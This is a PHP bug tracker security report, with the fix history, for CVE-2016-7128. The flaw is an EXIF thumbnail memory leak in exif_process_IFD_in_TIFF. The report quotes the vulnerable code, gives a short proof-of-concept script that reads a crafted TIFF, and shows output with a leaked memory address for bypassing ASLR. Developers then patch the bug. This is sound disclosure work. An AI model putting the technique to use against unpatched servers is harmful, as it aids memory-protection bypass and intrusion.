php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72627 Memory Leakage In exif_process_IFD_in_TIFF
Submitted: 2016-07-20 07:03 UTC Modified: 2016-09-05 15:28 UTC
From: nguyenvuhoang199321 at gmail dot com Assigned: stas
Status: Closed Package: EXIF related
PHP Version: 5.6.24 OS: *Nix
Private report: No CVE-ID: 2016-7128
 [2016-07-20 07:03 UTC] nguyenvuhoang199321 at gmail dot com
Description:
------------
I found some vulnerable code that leads to the memory leak in exif_process_IFD_in_TIFF. Let take look at code chunk : 
```
if (!ImageInfo->Thumbnail.data && ImageInfo->Thumbnail.offset && ImageInfo->Thumbnail.size && ImageInfo->read_thumbnail) {
	ImageInfo->Thumbnail.data = safe_emalloc(ImageInfo->Thumbnail.size, 1, 0);
	php_stream_seek(ImageInfo->infile, ImageInfo->Thumbnail.offset, SEEK_SET);
	fgot = php_stream_read(ImageInfo->infile, ImageInfo->Thumbnail.data, ImageInfo->Thumbnail.size);
	if (fgot < ImageInfo->Thumbnail.size) {
		EXIF_ERRLOG_THUMBEOF(ImageInfo)
	}
	exif_thumbnail_build(ImageInfo);
}
```
Because lack of checking ImageInfo->Thumbnail.offset if an attack set ImageInfo->Thumbnail.offset larger than ImageInfo->FileSize then *php_stream_read* return 0 to fgot, because  EXIF_ERRLOG_THUMBEOF was defined as : 
```
#define EXIF_ERRLOG_THUMBEOF(ImageInfo)   exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_WARNING, "%s", EXIF_ERROR_THUMBEOF);

```
As you can see there is no exit after this error is output.
After that exif_thumbnail_build(ImageInfo) is called. Because this thumbnail I applied is IMAGE_FILETYPE_JPEG so exif_thumbnail_build will return without error.

Finally ImageInfo->Thumbnail.data is no fill by user data that lead to information leak like below, an attacker can leak address and then use it to bypass some protection such as PIE, ASLR,...

Here the tiff file : https://drive.google.com/open?id=0B0D1DYQpkA9UVGE5QlJaNnIxb1E

Affect : Linux, Mac Os X

Test script:
---------------
<?php
	$exif = exif_read_data('exif/gen.tiff',0,0,true);
	var_dump($exif);

	$thumb = $exif['THUMBNAIL']['THUMBNAIL'];
	echo bin2hex($thumb);
?>

Actual result:
--------------
$./php exif.php

Warning: exif_read_data(gen.tiff): Thumbnail goes IFD boundary or end of file reached in /vagrant_extend/audit/exif.php on line 2

Warning: exif_read_data(gen.tiff): Error in TIFF: filesize(x04E2) less than start of IFD dir(x829A0004) in /vagrant_extend/audit/exif.php on line 2
array(11) {
  ["FileName"]=>
  string(8) "gen.tiff"
  ["FileDateTime"]=>
  int(1468986539)
  ["FileSize"]=>
  int(1250)
  ["FileType"]=>
  int(7)
  ["MimeType"]=>
  string(10) "image/tiff"
  ["SectionsFound"]=>
  string(30) "ANY_TAG, IFD0, THUMBNAIL, EXIF"
  ["COMPUTED"]=>
  array(10) {
    ["html"]=>
    string(24) "width="128" height="132""
    ["Height"]=>
    int(132)
    ["Width"]=>
    int(128)
    ["IsColor"]=>
    int(0)
    ["ByteOrderMotorola"]=>
    int(0)
    ["ApertureFNumber"]=>
    string(5) "f/1.0"
    ["Thumbnail.FileType"]=>
    int(2)
    ["Thumbnail.MimeType"]=>
    string(10) "image/jpeg"
    ["Thumbnail.Height"]=>
    int(132)
    ["Thumbnail.Width"]=>
    int(128)
  }
  ["XResolution"]=>
  string(21) "1414812756/1414812756"
  ["THUMBNAIL"]=>
  array(5) {
    ["ImageWidth"]=>
    int(128)
    ["ImageLength"]=>
    int(132)
    ["JPEGInterchangeFormat"]=>
    int(1280)
    ["JPEGInterchangeFormatLength"]=>
    int(200)
    ["THUMBNAIL"]=>
    string(200) "" # leak leak
  }
  ["ExposureTime"]=>
  string(21) "1414812756/1414812756"
  ["FNumber"]=>
  string(21) "1414812756/1414812756"
}
00c2a7081e7f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 => leak leak (00c2a7081e7f => 0x7f1e08a7c200)

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-08-08 07:51 UTC] stas@php.net
-PHP Version: 7.0.8 +PHP Version: 5.6.24 -Assigned To: +Assigned To: stas
 [2016-08-08 07:51 UTC] stas@php.net
Fix in https://gist.github.com/99b4cc71096d54075cf1cc91caf3266e and in security repo in 620b01337cc39f856ca68c34c35e154f5f0682fc. Please verify.
 [2016-08-08 07:59 UTC] nguyenvuhoang199321 at gmail dot com
OK bug is fixed
 [2016-08-15 06:04 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-08-17 05:51 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-08-17 05:51 UTC] stas@php.net
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2016-08-17 06:40 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-08-17 06:40 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-08-17 08:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6dbb1ee46b5f4725cc6519abf91e512a2a10dfed
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 08:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24fb60ffe9d23a6af27d96b74a85f6a237bbd14a
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 09:15 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6dbb1ee46b5f4725cc6519abf91e512a2a10dfed
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 09:15 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24fb60ffe9d23a6af27d96b74a85f6a237bbd14a
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 12:04 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=749cae0fa13a097c13f96d631cc4e081e545efd4
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 19:10 UTC] kalle@php.net
Automatic comment on behalf of kalle
Revision: http://git.php.net/?p=php-src.git;a=commit;h=15b7b1a5107f385cbd3551f6c6b5d7149c3adf19
Log: Further fix bug #72627 from Stas
 [2016-08-18 11:15 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=32a629ef2cff754c3dd6cc24eb1e25aeaf439891
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-09-05 15:28 UTC] remi@php.net
-CVE-ID: needed +CVE-ID: 2016-7128
 [2016-10-10 11:17 UTC] krakjoe@php.net
Automatic comment on behalf of kalle
Revision: http://git.php.net/?p=php-src.git;a=commit;h=15b7b1a5107f385cbd3551f6c6b5d7149c3adf19
Log: Further fix bug #72627 from Stas
 [2016-10-17 10:09 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6dbb1ee46b5f4725cc6519abf91e512a2a10dfed
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-10-17 10:09 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24fb60ffe9d23a6af27d96b74a85f6a237bbd14a
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2017-01-12 09:12 UTC] krakjoe@php.net
Automatic comment on behalf of kalle
Revision: http://git.php.net/?p=php-src.git;a=commit;h=15b7b1a5107f385cbd3551f6c6b5d7149c3adf19
Log: Further fix bug #72627 from Stas
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Apr 30 01:01:34 2017 UTC